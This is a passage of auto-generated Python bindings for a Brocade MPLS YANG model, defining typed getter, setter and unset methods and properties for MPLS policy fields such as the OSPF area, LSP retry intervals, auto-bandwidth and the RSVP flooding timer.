Setter method for policy_ospf_area_defined, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ospf_area_defined (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_ospf_area_defined is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_ospf_area_defined() directly.
YANG Description: MPLS TE ospf area defined
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ospf-area-defined", rest_name="policy-ospf-area-defined", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_ospf_area_defined must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ospf-area-defined", rest_name="policy-ospf-area-defined", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_ospf_area_defined = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_ospf_area_defined(self):
self.__policy_ospf_area_defined = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ospf-area-defined", rest_name="policy-ospf-area-defined", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_ospf_area(self):
"""
Getter method for policy_ospf_area, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ospf_area (uint32)
YANG Description: MPLS TE ospf area
"""
return self.__policy_ospf_area
def _set_policy_ospf_area(self, v, load=False):
"""
Setter method for policy_ospf_area, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ospf_area (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_ospf_area is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_ospf_area() directly.
YANG Description: MPLS TE ospf area
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-ospf-area", rest_name="policy-ospf-area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_ospf_area must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-ospf-area", rest_name="policy-ospf-area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__policy_ospf_area = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_ospf_area(self):
self.__policy_ospf_area = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-ospf-area", rest_name="policy-ospf-area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_policy_handle_ospf_nbr_dn(self):
"""
Getter method for policy_handle_ospf_nbr_dn, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_handle_ospf_nbr_dn (uint8)
YANG Description: Handle IGP OSPF neighbor down event
"""
return self.__policy_handle_ospf_nbr_dn
def _set_policy_handle_ospf_nbr_dn(self, v, load=False):
"""
Setter method for policy_handle_ospf_nbr_dn, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_handle_ospf_nbr_dn (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_handle_ospf_nbr_dn is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_handle_ospf_nbr_dn() directly.
YANG Description: Handle IGP OSPF neighbor down event
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-ospf-nbr-dn", rest_name="policy-handle-ospf-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_handle_ospf_nbr_dn must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-ospf-nbr-dn", rest_name="policy-handle-ospf-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_handle_ospf_nbr_dn = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_handle_ospf_nbr_dn(self):
self.__policy_handle_ospf_nbr_dn = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-ospf-nbr-dn", rest_name="policy-handle-ospf-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_handle_isis_nbr_dn(self):
"""
Getter method for policy_handle_isis_nbr_dn, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_handle_isis_nbr_dn (uint8)
YANG Description: Handle IGP ISIS neighbor down event
"""
return self.__policy_handle_isis_nbr_dn
def _set_policy_handle_isis_nbr_dn(self, v, load=False):
"""
Setter method for policy_handle_isis_nbr_dn, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_handle_isis_nbr_dn (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_handle_isis_nbr_dn is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_handle_isis_nbr_dn() directly.
YANG Description: Handle IGP ISIS neighbor down event
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-isis-nbr-dn", rest_name="policy-handle-isis-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_handle_isis_nbr_dn must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-isis-nbr-dn", rest_name="policy-handle-isis-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_handle_isis_nbr_dn = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_handle_isis_nbr_dn(self):
self.__policy_handle_isis_nbr_dn = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-handle-isis-nbr-dn", rest_name="policy-handle-isis-nbr-dn", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_lsp_fast_retry_on(self):
"""
Getter method for policy_lsp_fast_retry_on, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_lsp_fast_retry_on (uint8)
YANG Description: LSP rapid retry
"""
return self.__policy_lsp_fast_retry_on
def _set_policy_lsp_fast_retry_on(self, v, load=False):
"""
Setter method for policy_lsp_fast_retry_on, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_lsp_fast_retry_on (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_lsp_fast_retry_on is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_lsp_fast_retry_on() directly.
YANG Description: LSP rapid retry
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-lsp-fast-retry-on", rest_name="policy-lsp-fast-retry-on", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_lsp_fast_retry_on must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-lsp-fast-retry-on", rest_name="policy-lsp-fast-retry-on", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_lsp_fast_retry_on = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_lsp_fast_retry_on(self):
self.__policy_lsp_fast_retry_on = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-lsp-fast-retry-on", rest_name="policy-lsp-fast-retry-on", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_max_lsp_retries(self):
"""
Getter method for policy_max_lsp_retries, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_max_lsp_retries (uint16)
YANG Description: maximum number of retries
"""
return self.__policy_max_lsp_retries
def _set_policy_max_lsp_retries(self, v, load=False):
"""
Setter method for policy_max_lsp_retries, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_max_lsp_retries (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_max_lsp_retries is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_max_lsp_retries() directly.
YANG Description: maximum number of retries
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-max-lsp-retries", rest_name="policy-max-lsp-retries", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_max_lsp_retries must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-max-lsp-retries", rest_name="policy-max-lsp-retries", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__policy_max_lsp_retries = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_max_lsp_retries(self):
self.__policy_max_lsp_retries = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-max-lsp-retries", rest_name="policy-max-lsp-retries", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_policy_lsp_retry_interval(self):
"""
Getter method for policy_lsp_retry_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_lsp_retry_interval (uint16)
YANG Description: LSP periodic retry time
"""
return self.__policy_lsp_retry_interval
def _set_policy_lsp_retry_interval(self, v, load=False):
"""
Setter method for policy_lsp_retry_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_lsp_retry_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_lsp_retry_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_lsp_retry_interval() directly.
YANG Description: LSP periodic retry time
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-lsp-retry-interval", rest_name="policy-lsp-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_lsp_retry_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-lsp-retry-interval", rest_name="policy-lsp-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__policy_lsp_retry_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_lsp_retry_interval(self):
self.__policy_lsp_retry_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-lsp-retry-interval", rest_name="policy-lsp-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_policy_frr_bkup_retry_interval(self):
"""
Getter method for policy_frr_bkup_retry_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_frr_bkup_retry_interval (uint32)
YANG Description: FRR backup/detour retry time in seconds
"""
return self.__policy_frr_bkup_retry_interval
def _set_policy_frr_bkup_retry_interval(self, v, load=False):
"""
Setter method for policy_frr_bkup_retry_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_frr_bkup_retry_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_frr_bkup_retry_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_frr_bkup_retry_interval() directly.
YANG Description: FRR backup/detour retry time in seconds
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-frr-bkup-retry-interval", rest_name="policy-frr-bkup-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_frr_bkup_retry_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-frr-bkup-retry-interval", rest_name="policy-frr-bkup-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__policy_frr_bkup_retry_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_frr_bkup_retry_interval(self):
self.__policy_frr_bkup_retry_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-frr-bkup-retry-interval", rest_name="policy-frr-bkup-retry-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_policy_auto_bw_enabled(self):
"""
Getter method for policy_auto_bw_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_auto_bw_enabled (uint8)
YANG Description: Auto-bandwidth enabled
"""
return self.__policy_auto_bw_enabled
def _set_policy_auto_bw_enabled(self, v, load=False):
"""
Setter method for policy_auto_bw_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_auto_bw_enabled (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_auto_bw_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_auto_bw_enabled() directly.
YANG Description: Auto-bandwidth enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-auto-bw-enabled", rest_name="policy-auto-bw-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_auto_bw_enabled must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-auto-bw-enabled", rest_name="policy-auto-bw-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_auto_bw_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_auto_bw_enabled(self):
self.__policy_auto_bw_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-auto-bw-enabled", rest_name="policy-auto-bw-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_auto_bw_sample_interval(self):
"""
Getter method for policy_auto_bw_sample_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_auto_bw_sample_interval (uint32)
YANG Description: Auto-bandwidth sample interval in seconds
"""
return self.__policy_auto_bw_sample_interval
def _set_policy_auto_bw_sample_interval(self, v, load=False):
"""
Setter method for policy_auto_bw_sample_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_auto_bw_sample_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_auto_bw_sample_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_auto_bw_sample_interval() directly.
YANG Description: Auto-bandwidth sample interval in seconds
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-auto-bw-sample-interval", rest_name="policy-auto-bw-sample-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_auto_bw_sample_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-auto-bw-sample-interval", rest_name="policy-auto-bw-sample-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__policy_auto_bw_sample_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_auto_bw_sample_interval(self):
self.__policy_auto_bw_sample_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-auto-bw-sample-interval", rest_name="policy-auto-bw-sample-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_policy_soft_preempt_cleanup_timer(self):
"""
Getter method for policy_soft_preempt_cleanup_timer, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_soft_preempt_cleanup_timer (uint16)
YANG Description: Soft preemption cleanup-timer in seconds
"""
return self.__policy_soft_preempt_cleanup_timer
def _set_policy_soft_preempt_cleanup_timer(self, v, load=False):
"""
Setter method for policy_soft_preempt_cleanup_timer, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_soft_preempt_cleanup_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_soft_preempt_cleanup_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_soft_preempt_cleanup_timer() directly.
YANG Description: Soft preemption cleanup-timer in seconds
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-soft-preempt-cleanup-timer", rest_name="policy-soft-preempt-cleanup-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_soft_preempt_cleanup_timer must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-soft-preempt-cleanup-timer", rest_name="policy-soft-preempt-cleanup-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__policy_soft_preempt_cleanup_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_soft_preempt_cleanup_timer(self):
self.__policy_soft_preempt_cleanup_timer = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-soft-preempt-cleanup-timer", rest_name="policy-soft-preempt-cleanup-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_policy_rsvp_periodic_flooding_timer(self):
"""
Getter method for policy_rsvp_periodic_flooding_timer, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rsvp_periodic_flooding_timer (uint16)
YANG Description: MPLS TE Periodic Flooding Timer in seconds
"""
return self.__policy_rsvp_periodic_flooding_timer
def _set_policy_rsvp_periodic_flooding_timer(self, v, load=False):
"""
Setter method for policy_rsvp_periodic_flooding_timer, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rsvp_periodic_flooding_timer (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_rsvp_periodic_flooding_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_rsvp_periodic_flooding_timer() directly.
YANG Description: MPLS TE Periodic Flooding Timer in seconds
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-rsvp-periodic-flooding-timer", rest_name="policy-rsvp-periodic-flooding-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_rsvp_periodic_flooding_timer must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-rsvp-periodic-flooding-timer", rest_name="policy-rsvp-periodic-flooding-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__policy_rsvp_periodic_flooding_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_rsvp_periodic_flooding_timer(self):
self.__policy_rsvp_periodic_flooding_timer = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-rsvp-periodic-flooding-timer", rest_name="policy-rsvp-periodic-flooding-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
policy_cspf_interface_constraint = __builtin__.property(_get_policy_cspf_interface_constraint, _set_policy_cspf_interface_constraint)
policy_cspf_group_computation_mode = __builtin__.property(_get_policy_cspf_group_computation_mode, _set_policy_cspf_group_computation_mode)
policy_use_bypass_metric = __builtin__.property(_get_policy_use_bypass_metric, _set_policy_use_bypass_metric)
policy_use_bypass_liberal = __builtin__.property(_get_policy_use_bypass_liberal, _set_policy_use_bypass_liberal)
policy_implicite_commit = __builtin__.property(_get_policy_implicite_commit, _set_policy_implicite_commit)
policy_label_propagate_ttl = __builtin__.property(_get_policy_label_propagate_ttl, _set_policy_label_propagate_ttl)
policy_vrf_propagate_ttl = __builtin__.property(_get_policy_vrf_propagate_ttl, _set_policy_vrf_propagate_ttl)
policy_propagate_ttl = __builtin__.property(_get_policy_propagate_ttl, _set_policy_propagate_ttl)
policy_rtm_route_filter_enabled = __builtin__.property(_get_policy_rtm_route_filter_enabled, _set_policy_rtm_route_filter_enabled)
policy_rtm_route_filter_all_ibgp_enabled = __builtin__.property(_get_policy_rtm_route_filter_all_ibgp_enabled, _set_policy_rtm_route_filter_all_ibgp_enabled)
policy_load_interval = __builtin__.property(_get_policy_load_interval, _set_policy_load_interval)
policy_ingress_tnnl_accounting = __builtin__.property(_get_policy_ingress_tnnl_accounting, _set_policy_ingress_tnnl_accounting)
policy_te_policy_ospf = __builtin__.property(_get_policy_te_policy_ospf, _set_policy_te_policy_ospf)
policy_te_policy_isis = __builtin__.property(_get_policy_te_policy_isis, _set_policy_te_policy_isis)
policy_ospf_area_defined = __builtin__.property(_get_policy_ospf_area_defined, _set_policy_ospf_area_defined)
policy_ospf_area = __builtin__.property(_get_policy_ospf_area, _set_policy_ospf_area)
policy_handle_ospf_nbr_dn = __builtin__.property(_get_policy_handle_ospf_nbr_dn, _set_policy_handle_ospf_nbr_dn)
policy_handle_isis_nbr_dn = __builtin__.property(_get_policy_handle_isis_nbr_dn, _set_policy_handle_isis_nbr_dn)
policy_lsp_fast_retry_on = __builtin__.property(_get_policy_lsp_fast_retry_on, _set_policy_lsp_fast_retry_on)
policy_max_lsp_retries = __builtin__.property(_get_policy_max_lsp_retries, _set_policy_max_lsp_retries)
policy_lsp_retry_interval = __builtin__.property(_get_policy_lsp_retry_interval, _set_policy_lsp_retry_interval)
policy_frr_bkup_retry_interval = __builtin__.property(_get_policy_frr_bkup_retry_interval, _set_policy_frr_bkup_retry_interval)
policy_auto_bw_enabled = __builtin__.property(_get_policy_auto_bw_enabled, _set_policy_auto_bw_enabled)
policy_auto_bw_sample_interval = __builtin__.property(_get_policy_auto_bw_sample_interval, _set_policy_auto_bw_sample_interval)
policy_soft_preempt_cleanup_timer = __builtin__.property(_get_policy_soft_preempt_cleanup_timer, _set_policy_soft_preempt_cleanup_timer)
policy_rsvp_periodic_flooding_timer = __builtin__.property(_get_policy_rsvp_periodic_flooding_timer, _set_policy_rsvp_periodic_flooding_timer)
